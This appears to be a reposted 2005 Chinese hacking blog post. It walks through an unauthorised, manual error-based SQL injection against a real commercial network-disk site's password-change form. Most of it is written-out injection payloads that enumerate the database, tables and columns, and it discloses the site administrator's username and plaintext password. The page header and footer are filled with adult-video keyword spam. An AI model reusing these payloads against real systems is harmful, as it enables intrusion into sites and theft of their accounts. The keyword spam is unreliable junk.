国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

對一個大型網(wǎng)絡(luò)硬盤營業(yè)站點(diǎn)的測試
2005-12-17   

晚上,閑來無事,QQ群又吵死..無奈,于是對經(jīng)常用的網(wǎng)絡(luò)硬盤的一個網(wǎng)站測試,現(xiàn)在的注入弱點(diǎn)都已經(jīng)封得不能再封了,沒辦法,不過逛來逛去,來到了一個提交表單的面前"修改密碼"。
本次全為手動,沒有用任何工具.

 




在用戶名中加了一個',返回以下錯誤
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' AND datediff(hour,ChangeTime,getdate())<=1 AND Succeed=0' 之前有未閉合的引號。
/service/changepass.asp,行 99
nnd,原來是asp+mssql,好,要玩就玩大的.
既然用戶名里可以輸入,其它三個框都沒有必要了,于是在本地搭建一個表單,maxlength="150" size="150",設(shè)得長一些,好可以輸入語句.

 



首先說明,在mssql數(shù)據(jù)庫中sysdatabase中是默認(rèn)系統(tǒng)表,包含master、model、msdb、mssqlweb和empdb 5個數(shù)據(jù)庫的項(xiàng),dbid從1到5是系統(tǒng)的,分別是以上5個項(xiàng),如果用戶新建的話,那么dbid肯定從6開始,那么我們就試試暴出它玩玩.
在用戶輸入框中輸入:
' and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) and '1'='1
返回如下圖所值



好的,一個Northwind 庫名暴了出來,哎~~要的不是這個,下來依次提交dbid=7,報(bào)出了如下圖結(jié)果:



HOHO
這個是我所要的,因?yàn)槲野裠bid從6到8到試過了,后面都是返回了正常頁面,而且當(dāng)dbid=7的時(shí)候,這里的庫名和網(wǎng)站的名稱是一樣的,所以確定為網(wǎng)站的庫名。 其中我已經(jīng)把庫名屏蔽,以下用xxxxxxx來表示.............
既然得到了庫名,相應(yīng)的就是要暴出他的表名。OK,依然往下提交。
' and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U') and '1'='1
OK,結(jié)果暴出了如下圖



哎,得到Email_filts不是我要的,繼續(xù)提交
'and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U' and name not in('Email_Filts')) and '1'='1
得到'ADDSize_LOG'
繼續(xù)提交
'and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U' and name not in('Email_Filts','ADDSize_LOG')) and '1'='1
得到'admin',好了,得到他了,應(yīng)該沒有錯,HOHO
得到admin這個表,下來就是要表中的值了.
在用戶名中提交:
'and 0<>(select count(*) from xxxxxxx.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) and '1'='1



如圖得到ID號:1653580929
哈哈,既然有了ID號,這下還不死??
現(xiàn)次提交:
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929) and '1'='1
暴出adminid,不是我要的,繼續(xù):
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929 and name not in('adminid')) and '1'='1
暴出adminpass,繼續(xù):
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929 and name not in('adminid','adminpass')) and '1'='1
暴出adminuser,再繼續(xù):
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929 and name not in('adminid','adminpass','adminuser')) and '1'='1
呵呵,返回正常頁面,不用了,一口氣暴了3個值夠了.
這下有了adminuser和adminpass,是個人都知道是什么吧,這下我們要這2個字段的值.
用最精典的如:user>0來暴
在用戶名中輸入:
'and 0<>(select adminid from xxxxxxx.dbo.admin where adminuser>1) and '1'='1
如圖:



adminuser=liqianlong,啥也不說了
再輸入:
'and 0<>(select adminid from xxxxxxx.dbo.admin where adminuser='liqianlong' and adminpass>1) and '1'='1
如圖:



adminpass=laoziyanhuifeiyang
暈,密碼:老子煙灰飛揚(yáng)????? 牛!!! 不說啥了,還不加密。如果加密了也沒關(guān)系,可以用updata來修寫他的密碼。
弄了半天,一看,網(wǎng)頁和數(shù)據(jù)庫不是一個服務(wù)器,我昏,玩完,iis記錄,ai....我的權(quán)限,不是讓我用同網(wǎng)段來.......#$#$#$#%$%&^%&
呵呵,這是給新手一個小小手工測試方法,關(guān)鍵在于靈活應(yīng)用.


熱詞搜索:

上一篇:跨站式SQL注入技巧
下一篇:利用leadbbsCookie欺騙漏洞進(jìn)行的入侵

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲精品免费在线观看| 天堂影院一区二区| 91啪在线观看| 午夜精品影院在线观看| 国产精品福利一区二区| 亚洲午夜av在线| 日本一区免费视频| 日本一二三不卡| 中文文精品字幕一区二区| 精品久久久网站| 三级不卡在线观看| 亚洲第一狼人社区| 一区二区三区在线免费观看| 日韩一区二区在线观看| 91农村精品一区二区在线| 欧美福利视频一区| 欧美精品在线一区二区三区| 26uuuu精品一区二区| 欧美精品一区二区三| 成人午夜视频在线观看| 国产精品卡一卡二| 欧美日韩一区二区在线视频| 久久成人久久鬼色| 一区二区三区.www| 国产午夜亚洲精品午夜鲁丝片| 91在线视频播放地址| 麻豆成人久久精品二区三区红 | 91在线视频播放地址| 青草国产精品久久久久久| 国产精品免费丝袜| 久久综合久久综合久久| 91精品久久久久久久久99蜜臂| 不卡一区在线观看| 国产精品亚洲人在线观看| 三级一区在线视频先锋| 亚洲天堂福利av| 欧美韩国日本不卡| 久久久国产精品麻豆| 欧美成人欧美edvon| 4438x成人网最大色成网站| 在线视频中文字幕一区二区| 成人性生交大片免费看视频在线 | 欧美在线三级电影| 99久久精品国产导航| 国产福利91精品一区| 国产乱国产乱300精品| 日韩激情一区二区| 天天色天天操综合| 三级欧美在线一区| 日本不卡一区二区三区高清视频| 亚洲曰韩产成在线| 亚洲一二三四在线| 亚洲国产日韩精品| 亚洲成人免费在线观看| 亚洲综合男人的天堂| 亚洲成人中文在线| 日韩福利电影在线观看| 美女国产一区二区三区| 激情综合色播五月| 国产成人一区二区精品非洲| 成人听书哪个软件好| 成人av免费在线| 日本韩国视频一区二区| 欧美美女一区二区三区| 日韩女优制服丝袜电影| 欧美videofree性高清杂交| 欧美成人三级电影在线| 欧美激情一区在线观看| 亚洲欧美综合另类在线卡通| 玉米视频成人免费看| 亚洲成人先锋电影| 国产一区欧美二区| 91在线免费看| 欧美伦理影视网| 久久久久综合网| 亚洲精品日韩专区silk| 日本色综合中文字幕| 福利一区二区在线| 在线观看视频一区二区欧美日韩| 欧美日韩视频不卡| 亚洲国产精品ⅴa在线观看| 一区二区三区在线视频观看58 | 99久久综合99久久综合网站| 在线视频国内自拍亚洲视频| 日韩一级大片在线| 亚洲精品免费在线观看| 久久精品国产秦先生| 99视频超级精品| 精品成a人在线观看| 中文字幕在线不卡一区 | 亚洲成精国产精品女| 精品亚洲成a人| 欧美性大战久久久久久久蜜臀| 久久日韩粉嫩一区二区三区| 亚洲制服欧美中文字幕中文字幕| 蜜臀av亚洲一区中文字幕| 成人激情综合网站| 欧美成人一区二区三区在线观看| 亚洲精品精品亚洲| 成人精品一区二区三区四区| 日韩一区二区三区观看| 亚洲综合在线第一页| 成人综合在线网站| 精品久久一区二区| 日本91福利区| 欧美三级日本三级少妇99| 亚洲丝袜精品丝袜在线| 国产综合久久久久久鬼色| 欧美日韩色综合| 亚洲精品写真福利| 99久久综合国产精品| 日本一区二区不卡视频| 国内精品国产成人| 精品久久久久久久久久久久包黑料| 亚洲高清免费视频| 在线观看av不卡| 亚洲乱码国产乱码精品精可以看| 国产精品一二三四区| 精品毛片乱码1区2区3区| 免费看欧美女人艹b| 在线不卡免费欧美| 日韩激情一区二区| 777奇米成人网| 日韩av一二三| 欧美一区二区三区婷婷月色| 亚洲成人1区2区| 777色狠狠一区二区三区| 日韩精品国产欧美| 欧美一二三区在线观看| 蜜桃av一区二区| 欧美va亚洲va香蕉在线| 久热成人在线视频| 国产欧美综合在线| 成人禁用看黄a在线| 亚洲免费观看视频| 欧美久久久久免费| 韩国在线一区二区| 日本一区免费视频| 色综合久久久久综合体桃花网| 亚洲欧美激情小说另类| 欧美日本国产视频| 极品少妇xxxx精品少妇偷拍| 久久久久久久久久美女| caoporn国产精品| 亚洲一区二区三区在线看| 在线成人av影院| 国产黑丝在线一区二区三区| 国产精品久久久久久妇女6080| 91久久精品一区二区三| 天堂蜜桃91精品| 精品美女一区二区| 97久久久精品综合88久久| 一区二区高清视频在线观看| 88在线观看91蜜桃国自产| 国产夫妻精品视频| 亚洲综合丝袜美腿| 欧美成人r级一区二区三区| 成人高清在线视频| 婷婷久久综合九色综合伊人色| 久久婷婷久久一区二区三区| 97久久超碰国产精品| 男女男精品视频网| 亚洲欧洲日韩一区二区三区| 777奇米成人网| 97se狠狠狠综合亚洲狠狠| 美腿丝袜亚洲一区| 一区二区三区中文字幕电影| 日韩你懂的在线播放| 97久久超碰精品国产| 久久av中文字幕片| 一级女性全黄久久生活片免费| 欧美电影免费观看高清完整版| 一本色道久久综合亚洲aⅴ蜜桃| 日本成人在线网站| 亚洲精品日产精品乱码不卡| 久久精品视频免费| 欧美一区二区三区精品| 91九色02白丝porn| 99国产精品国产精品毛片| 国产毛片精品视频| 天天av天天翘天天综合网色鬼国产| 国产精品三级在线观看| 精品久久久久久久一区二区蜜臀| 欧美在线观看禁18| 成人高清av在线| 久久99精品国产.久久久久久| 亚洲香蕉伊在人在线观| 亚洲色图在线播放| 国产精品三级av| 国产欧美一二三区| 26uuu亚洲综合色欧美 | 欧美激情在线免费观看| 日韩欧美中文字幕一区| 欧美夫妻性生活| 欧美精品乱码久久久久久按摩 | 色综合久久久久综合体桃花网| 成人在线综合网站| 国产精品一二二区| 成人午夜在线播放| www.视频一区|